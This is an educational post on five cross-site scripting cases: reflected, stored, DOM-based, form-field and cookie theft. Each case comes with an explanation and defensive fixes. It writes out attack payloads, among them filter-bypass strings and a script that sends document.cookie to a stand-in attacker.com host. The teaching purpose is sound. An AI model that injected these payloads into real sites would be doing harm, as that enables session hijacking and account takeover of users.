
Breaking Down the Web: 5 Real-Life XSS Attacks, How They Work and How to Fix Them

For definition, remediation and more examples on XSS please visit the entry: https://www.girlscanhack.com/post/xssploited-how-cross-site-scripting-can-leave-your-web-app-vulnerable


Here are 5 practical examples of Cross-Site Scripting (XSS), each with the vulnerable code or payload, how the attack works, and the fix.


Reflected XSS via URL parameter


(URL)

http://example.com/search?q=<script>alert("XSS");</script>


In this example, the search page echoes the q parameter straight back into the HTML response without encoding it. The attacker crafts a link carrying a script in q (URL-encoded in a real attack) and, when the victim opens it, the script runs in the victim's browser in the context of example.com. The alert box is only the proof of concept; the same injection point can run any JavaScript, for example the cookie-stealing script in the last example.


To fix this, encode the value at the point where it is written into the HTML. Validating the input is a useful extra check, but the control that actually stops the injection is output encoding: the characters that have meaning in HTML (&, <, >, ", ') must be converted to their entity forms so the browser treats the input as text rather than markup. In PHP, htmlspecialchars() with ENT_QUOTES does this for the HTML body and for quoted attribute values. It is not sufficient for other contexts, such as a value placed inside a JavaScript block, an unquoted attribute or a URL.


// Encode for the HTML context at output time; '?? ""' avoids a notice when q is absent
$q = htmlspecialchars($_GET['q'] ?? '', ENT_QUOTES, 'UTF-8');


Stored XSS in comment section


(HTML)

<div class="comment-section">

<p>Leave a comment:</p>

<textarea id="comment"></textarea>

<button onclick="submitComment()">Submit</button>

</div>


In this example, the comment typed into the textarea is sent to the server, stored, and later written back into the page for every visitor. If the server stores and renders it without encoding, an attacker posts a comment containing a script once, and it runs in the browser of every user who views the comment section. Stored XSS is more dangerous than reflected XSS because the victim does not have to click anything.


The fix depends on what comments are allowed to contain. If they are plain text, store them as submitted and HTML-encode them on output, exactly as in the previous example. If users are allowed a limited subset of HTML (bold, links, lists), encoding is not an option and you need an allowlist sanitizer: a library such as HTML Purifier parses the submitted HTML and keeps only the tags and attributes you permit, dropping scripts, event handlers and javascript: URLs. Do not try to write this yourself with regular expressions; blocklists that remove "<script>" are routinely bypassed.


(PHP)

// Load HTML Purifier (the path depends on where the library is unpacked)
require_once 'htmlpurifier-4.12.0/library/HTMLPurifier.auto.php';

// Default configuration: a conservative allowlist of safe tags and attributes
$config = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);

// Returns the comment with everything outside the allowlist removed
$comment = $purifier->purify($_POST['comment'] ?? '');
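The following is an added example, not code from the original post, showing why a home-grown "remove the script tags" filter is not a sanitizer and why comments that must allow some HTML need a parser-based allowlist sanitizer such as HTML Purifier. The function names and both payloads are constructed for this demonstration.

```javascript
// Added example (not from the original post): a blocklist "sanitizer" beside
// the two payloads that defeat it. Function names and payloads are constructed.

// Naive blocklist sanitizer: delete anything that looks like a <script> tag.
function naiveStripScripts(html) {
  return html.replace(/<\/?script\b[^>]*>/gi, "");
}

// "Improved" blocklist: repeat until nothing changes, to defeat nesting tricks.
function stripScriptsUntilStable(html) {
  let before;
  do {
    before = html;
    html = naiveStripScripts(html);
  } while (html !== before);
  return html;
}

// The text-only alternative: no HTML is allowed, so every metacharacter is
// encoded (numeric character references; same effect as htmlspecialchars).
function encodeAsText(str) {
  return String(str).replace(/[&<>"']/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Payload 1: the tag split in two with a decoy tag in the middle. One pass of
// the blocklist removes the decoy and glues the halves into a live <script>.
const NESTED_SCRIPT = "<scr<script>ipt>alert(1)</scr</script>ipt>";

// Payload 2: no <script> tag at all. Event handlers on ordinary tags run
// JavaScript too, and a script-tag blocklist never looks at them.
const EVENT_HANDLER = '<img src="x" onerror="alert(1)">';

function demo() {
  return {
    // one pass turns the nested payload into a working script tag
    nestedAfterOnePass: naiveStripScripts(NESTED_SCRIPT),
    // looping does neutralise payload 1 ...
    nestedAfterLoop: stripScriptsUntilStable(NESTED_SCRIPT),
    // ... but payload 2 passes through completely untouched
    eventHandlerAfterLoop: stripScriptsUntilStable(EVENT_HANDLER),
    // encoding makes both inert without needing to recognise any attack
    nestedAsText: encodeAsText(NESTED_SCRIPT),
    eventHandlerAsText: encodeAsText(EVENT_HANDLER),
  };
}
```

The point is that a blocklist has to know every way JavaScript can be expressed in HTML, while an allowlist sanitizer only has to know the handful of tags and attributes you actually want to keep; that is why HTML Purifier parses the markup instead of pattern-matching it.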



DOM-based XSS via JavaScript


(HTML)

<script>
// Source: attacker-controlled data taken from the URL (window.location.search)
var searchResults = document.getElementById("search-results");
var searchTerm = window.location.search.replace("?q=", "");
// Sink: innerHTML parses the string as HTML, so any tag in searchTerm becomes live markup
searchResults.innerHTML = "<h2>Search results for: " + searchTerm + "</h2>";
</script>


In this example the page builds HTML in the browser from untrusted data: the source is window.location.search and the sink is innerHTML. Nothing is reflected by the server, so the payload never appears in the HTTP response and a server-side filter will not see it. An attacker who gets the victim to open a URL with a tag in q, for example an <img> with an onerror handler, has that tag parsed and its handler executed as soon as this script runs.


To fix this, stop treating the search term as HTML. Write it into the page through a sink that only accepts text, such as textContent or createTextNode, instead of innerHTML, and read the parameter with URLSearchParams rather than string replacement. Validating the input against an allowlist, as in the snippet below, is a useful extra layer; note that it also rejects legitimate terms containing spaces, hyphens or apostrophes, and that innerHTML only stays safe here because the allowlist is strict.


(Javascript)

var searchResults = document.getElementById("search-results");
var searchTerm = window.location.search.replace("?q=", "");

// Allowlist: only letters and digits may reach the innerHTML sink
if (/^[a-zA-Z0-9]+$/.test(searchTerm)) {
  searchResults.innerHTML = "<h2>Search results for: " + searchTerm + "</h2>";
} else {
  searchResults.innerHTML = "<p>Invalid search term.</p>";
}
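As an added example, not code from the original post, here is the DOM-based fix done with a safe sink: the source stays window.location.search, the parameter is parsed with URLSearchParams, and the sink becomes textContent, which never parses HTML, so no allowlist on the term is needed for safety. The stub document is constructed so the code runs outside a browser (in a page you would pass the real document); the function names are my own.

```javascript
// Added example (not from the original post). Function names are assumptions;
// the stub DOM is constructed so this runs under Node as well as in a browser.

// Parse the query string properly: the original replace("?q=", "") breaks on
// "?page=2&q=..." and leaves "%20" un-decoded. URLSearchParams handles both.
function getSearchTerm(search) {
  const params = new URLSearchParams(search);
  return params.get("q") || "";
}

// Render the heading through textContent. Whatever the term contains, it is
// inserted as a text node; '<img onerror=...>' arrives as literal characters.
function renderSearchHeading(doc, container, term) {
  const heading = doc.createElement("h2");
  heading.textContent = "Search results for: " + term;
  container.replaceChildren(heading);
  return heading;
}

// Minimal stand-in for the DOM (constructed for this example): just enough of
// createElement/replaceChildren to show which property each path writes to.
function makeStubDocument() {
  const createElement = (tagName) => ({
    tagName: tagName.toUpperCase(),
    textContent: "",
    innerHTML: "",
    children: [],
    replaceChildren(...nodes) { this.children = nodes; },
  });
  return { createElement };
}

// The allowlist from the regex fix, kept here only to show what it rejects.
const ALLOWLIST = /^[a-zA-Z0-9]+$/;

function demo() {
  const doc = makeStubDocument();
  const container = doc.createElement("div");
  const payload = '<img src="x" onerror="alert(1)">';
  // the attacker's URL also carries another parameter before q
  const term = getSearchTerm("?page=2&q=" + encodeURIComponent(payload));
  const heading = renderSearchHeading(doc, container, term);
  return {
    term,                                   // the raw payload, as typed
    headingText: heading.textContent,       // shown to the user as literal text
    containerInnerHTML: container.innerHTML, // untouched: nothing was parsed as HTML
    decodedTerm: getSearchTerm("?q=zero%2Dday%20exploit"),
    allowlistRejectsApostrophe: !ALLOWLIST.test("O'Reilly"),
    allowlistRejectsSpace: !ALLOWLIST.test("zero day"),
  };
}
```

With textContent the payload is displayed back to the user verbatim, which is harmless; the tag characters never reach the HTML parser. The same rule applies to other text-only sinks (createTextNode, setAttribute on a non-URL attribute) and does not apply to innerHTML, outerHTML, insertAdjacentHTML or document.write.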


Stored XSS in form field


(HTML)

<form action="https://example.com/login" method="post">

<label for="username">Username:</label>

<input type="text" id="username" name="username">

<label for="password">Password:</label>

<input type="password" id="password" name="password">

<button type="submit">Login</button>

</form>


In this example, the username submitted through the form is stored on the server. If it is later written back into a page without encoding, for instance in a "Welcome, <username>" banner or in an admin list of users, a script placed in the username field runs in the browser of whoever views that page. The login form itself is only the entry point; the vulnerability is in the page that renders the stored value.


To fix this, HTML-encode the username wherever it is written into HTML, with htmlspecialchars() as in the first example. Encoding the value before storing it, as the snippet below does, only works if HTML is the sole consumer of the data: anything else that reads the stored value (a JSON API, an e-mail, a log viewer) receives entity-encoded text, and a page that encodes again on output shows "&amp;lt;" to the user. Prefer storing the raw value and encoding at output, and separately validate the username against a sensible character set at registration.


(PHP)

// Encodes for the HTML context; see the caveat above about doing this before storage
$username = htmlspecialchars($_POST['username'] ?? '', ENT_QUOTES, 'UTF-8');
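The following added example (not code from the original post) covers both htmlspecialchars fixes in this post, the reflected q parameter and the stored username: the same encoding step written out, and why it belongs at output time rather than before storage. The in-memory user store, the function names and the payload are constructed for the demonstration.

```javascript
// Added example (not from the original post). The Map-based store, function
// names and payload are constructed for this demonstration.

// Equivalent of htmlspecialchars($s, ENT_QUOTES, 'UTF-8'): the five characters
// that can change meaning in an HTML body or a quoted attribute value.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

const users = new Map();

// Store the value as the user typed it; encoding is a property of the output
// context, not of the data.
function registerUser(username) {
  users.set(username, { username });
}

// HTML context: encode here, every time the value is written into markup.
function renderWelcomeHtml(username) {
  return "<h1>Welcome, " + escapeHtml(users.get(username).username) + "</h1>";
}

// A second consumer of the same data with a different encoding rule: JSON.
// Had the stored value been HTML-encoded, this API would hand "&lt;" to clients.
function renderUserJson(username) {
  return JSON.stringify({ username: users.get(username).username });
}

// What "encode before storing" does to the HTML path: the stored value is
// encoded again at output and the user sees a literal "&amp;lt;" on screen.
function doubleEncodedWelcome(username) {
  const storedEncoded = escapeHtml(username);
  return "<h1>Welcome, " + escapeHtml(storedEncoded) + "</h1>";
}

// Context matters: htmlspecialchars leaves "javascript:alert(1)" untouched, so
// a value used in an href needs a scheme allowlist as well as HTML encoding.
function isSafeHref(url) {
  try {
    const scheme = new URL(url, "https://example.com/").protocol;
    return scheme === "http:" || scheme === "https:";
  } catch (e) {
    return false; // unparsable URL: do not emit it
  }
}

const PAYLOAD = '<script>alert("XSS");</script>';
registerUser(PAYLOAD);
```

In practice the same escapeHtml call sits in the template layer (or the template engine does it for you with auto-escaping), and the database column holds exactly what the user typed.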


Session hijacking via cookie stealing


(HTML)

<script>
// Read every cookie the script is allowed to see (those without the HttpOnly flag)
var cookie = document.cookie;
// Smuggle it out as a query parameter of an image request to the attacker's server
var attackerURL = "http://attacker.com/steal.php?cookie=" + cookie;
var img = new Image();
img.src = attackerURL;
</script>


This one is a payload rather than a separate vulnerability: it is what an attacker delivers through any of the injection points above. The script reads the victim's cookies and creates an image whose URL points at the attacker's server with the cookie value as a parameter. The browser fetches the image as soon as src is set, sending the cookie to the attacker; the request succeeds even though it is cross-origin, because image loads are not blocked by the same-origin policy, and nothing visible changes on the page. With the session identifier in hand, the attacker sets it in their own browser and is logged in as the victim.


To limit the damage, set the HttpOnly flag so the cookie is not exposed through document.cookie (the script above then reads nothing), the Secure flag so it is only ever sent over HTTPS, and SameSite so it is not attached to cross-site requests. Be clear about what this does and does not do: HttpOnly protects the cookie value, but an XSS payload can still act as the user by sending requests from the victim's browser, which attaches the cookie automatically. The flags raise the bar for an attacker; the XSS itself still has to be fixed.


(PHP)

// Arguments: lifetime, path, domain, secure, httponly
// secure = only sent over HTTPS; httponly = not readable by document.cookie
// PHP 7.3+ also accepts an options array, which additionally takes a 'samesite' key
session_set_cookie_params(0, '/', '', true, true);
session_start();
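As an added example, not code from the original post, here is what the PHP cookie settings above translate to on the wire, plus a small checker you can point at a Set-Cookie header (from a proxy or from the response headers in the browser's developer tools) to confirm the flags actually reached the client. The function names and the sample headers are constructed for the demonstration.

```javascript
// Added example (not from the original post). Function names and the sample
// headers are constructed; the flag semantics follow RFC 6265 and its SameSite
// extension.

// Build a Set-Cookie header equivalent to session_set_cookie_params(0, '/', '',
// true, true), plus SameSite, which the positional PHP form cannot express.
function buildSessionCookie(name, value, opts = {}) {
  const { path = "/", secure = true, httpOnly = true, sameSite = "Lax" } = opts;
  const parts = [name + "=" + value, "Path=" + path];
  if (secure) parts.push("Secure");
  if (httpOnly) parts.push("HttpOnly");
  if (sameSite) parts.push("SameSite=" + sameSite);
  return parts.join("; ");
}

// Parse a Set-Cookie header into name, value and a lower-cased attribute map
// (attribute names are case-insensitive; flags without "=" become true).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const attr of attrs) {
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.attrs[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return cookie;
}

// Audit: which of the flags that matter for session theft are missing?
//  - HttpOnly: document.cookie cannot read it, so the exfiltration script gets nothing
//  - Secure:   never sent over plain http, so it cannot be sniffed on the network
//  - SameSite: not attached to cross-site requests (Lax or Strict; None is as good as absent)
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const missing = [];
  if (!c.attrs.httponly) missing.push("HttpOnly");
  if (!c.attrs.secure) missing.push("Secure");
  const sameSite = String(c.attrs.samesite || "").toLowerCase();
  if (sameSite !== "lax" && sameSite !== "strict") missing.push("SameSite=Lax or Strict");
  return { name: c.name, missing };
}

// Constructed sample headers: a PHP session cookie with default settings, and
// the hardened one the snippet above produces (with SameSite added).
const WEAK_HEADER = "PHPSESSID=abc123; Path=/";
const HARDENED_HEADER = buildSessionCookie("PHPSESSID", "abc123");
```

Run auditSessionCookie over the Set-Cookie headers your application actually emits rather than trusting the configuration file: a load balancer or a framework default can silently drop or override a flag.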

